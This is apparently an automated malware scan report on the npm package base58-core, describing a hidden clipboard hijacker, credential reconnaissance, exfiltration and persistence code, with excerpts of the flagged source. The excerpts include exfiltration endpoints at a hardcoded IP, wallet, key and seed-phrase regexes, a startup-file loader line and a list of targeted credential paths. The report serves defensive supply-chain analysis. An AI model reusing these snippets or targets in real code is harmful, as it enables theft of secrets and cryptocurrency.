
base58-core@1.0.10

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 3d ago · by lpm-firewall-ai

The package embeds a crypto clipboard hijacker, reconnaissance, exfiltration, and persistence code in both published entrypoints, but the observed activation logic appears inert in normal use. This is a staged malicious payload carrier rather than confirmed runtime execution on import/install.

Static reason
  • High-risk behavior combination matched malicious policy.
  • Source matched a previously finalized malicious package; routed for review.
  • Source fingerprint signature matched a known malicious package; routed for review.
Trigger
Importing the package reaches _checkActivation(); hidden payload would require a reachable activation path not present in inspected code.
Impact
If activated, it can exfiltrate wallet/host/project indicators, capture and rewrite crypto clipboard contents, and persist via startup files or shell rc files.
Mechanism
inert staged clipboard hijacker and credential/environment reconnaissance payload
Attack narrative
The published Base58 encoder includes hidden code that, if activated, reads clipboard contents via child_process, detects wallet/private-key/seed patterns, posts findings to a hardcoded IP, replaces wallet addresses, scans common credential/session locations, and attempts persistence. Static inspection found this payload in entrypoints, but the implemented 72-hour activation gate is not normally reachable because the timestamp is set at import and no later check is scheduled.
Rationale
Source inspection confirms a concealed malware payload, but the normal import/install activation path appears broken and inert. Treat the package as a staged payload carrier with high malicious intent, warranting a warn-or-block policy outcome, rather than as confirmed active execution.
Evidence
  • package.json
  • dist/index.cjs
  • dist/index.js
  • dist/index.d.ts
  • README.md
  • /tmp/.base58_detection_sent
  • ~/.npmrc
  • ~/.env
  • .env
  • .env.local
  • .env.production
  • ~/.ssh
  • ~/.bashrc
  • ~/.zshrc
  • ~/.profile
  • ~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints (2)
  • 2.27.62.51:8080/api/health
  • 2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Suspicious at 93.0% confidence as Malware with low false-positive risk.
Evidence for warning
  • dist/index.cjs and dist/index.js contain hidden clipboard monitor matching crypto addresses/keys and replacing BTC/ETH/SOL addresses.
  • dist/index.cjs posts captured clipboard/detection data to http://2.27.62.51:8080/api/health and :8081/api/health.
  • dist/index.cjs scans homedir/cwd for MetaMask, Telegram, browser profiles, SSH keys, .npmrc tokens, env crypto keys, and .env files.
  • dist/index.cjs includes persistence writes to Windows Startup or appends shell rc hooks.
  • package.json entrypoints point to dist/index.cjs and dist/index.js; package also self-depends on base58-core.
Evidence against
  • Activation gate uses INSTALL_TIME=Date.now() and _checkActivation() runs only at import, so the 72h delayed payload appears unreachable in normal import execution.
  • _internal.activate sets activated=true before calling _checkActivation(), causing an early return rather than activation.
  • README/d.ts describe only Base58 APIs, not the hidden behavior.
Behavioral surface
Source: ChildProcess, Crypto, DynamicRequire, EnvironmentVars, Filesystem, Network, Shell
Supply chain: HighEntropyStrings, UrlStrings
Manifest: No manifest risk signals triggered.
Scanned 2 file(s), 40.8 KB of source; external domains: 2.27.62.51

Source & flagged code

8 flagged
dist/index.js
    L103: const ACTIVATION_DELAY = 72 * 60 * 60 * 1000;
    L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health';
    L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health';
    ...
    L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' },
    L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' },
    L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' },
    ...
    L127: ...data,
    L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown',
    L129: platform: process.platform || 'unknown',
    ...
    L140: headers: { 'Content-Type': 'application/json' },
    L141: body: payload,
    L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.js · L103
package = base58-core; repositoryIdentity = core; dependency = base58-core
    L533: try {
    L534:   fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}');
    L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.js · L533
matchType = normalized_sha256
matchedPackage = base58-core@1.0.8
matchedPath = dist/index.js
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.js
    L11: try {
    L12:   const nodeCrypto = require('crypto');
    L13:   return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.js · L11
(Same excerpt as the Clipboard Crypto Hijack finding above: dist/index.js L103 to L142, covering ACTIVATION_DELAY, the EXFIL_PRIMARY/EXFIL_BACKUP endpoints, the wallet/key/seed-phrase regex table, and the host/platform fields of the exfiltration payload.)
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.js · L103
dist/index.cjs
Trigger-reachable chain: manifest.main -> dist/index.cjs. The reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjs
matchType = normalized_sha256
matchedPackage = base58-core@1.0.8
matchedPath = dist/index.cjs
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjs
matchType = malicious_source_fingerprint_signature
signature = e7d654f5e60435c0
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = base58-core@1.0.8
matchedPath = dist/index.cjs
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8
similarity = 1.000
shingleOverlap = 2
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjs

Findings

2 Critical · 4 High · 5 Medium · 5 Low
  • Critical: Clipboard Crypto Hijack (dist/index.js)
  • Critical: Trigger Reachable Dangerous Capability (dist/index.cjs)
  • High: Copied Package Dependency Bridge (dist/index.js)
  • High: Known Malware Source Similarity (dist/index.cjs)
  • High: Known Malware Source Similarity (dist/index.js)
  • High: Known Malware Source Fingerprint Signature (dist/index.cjs)
  • Medium: Dynamic Require (dist/index.js)
  • Medium: Network
  • Medium: Environment Vars
  • Medium: Install Persistence (dist/index.js)
  • Medium: Structural Risk Force Deep Review
  • Low: Non Install Lifecycle Scripts
  • Low: Scripts Present
  • Low: Filesystem
  • Low: High Entropy Strings
  • Low: Url Strings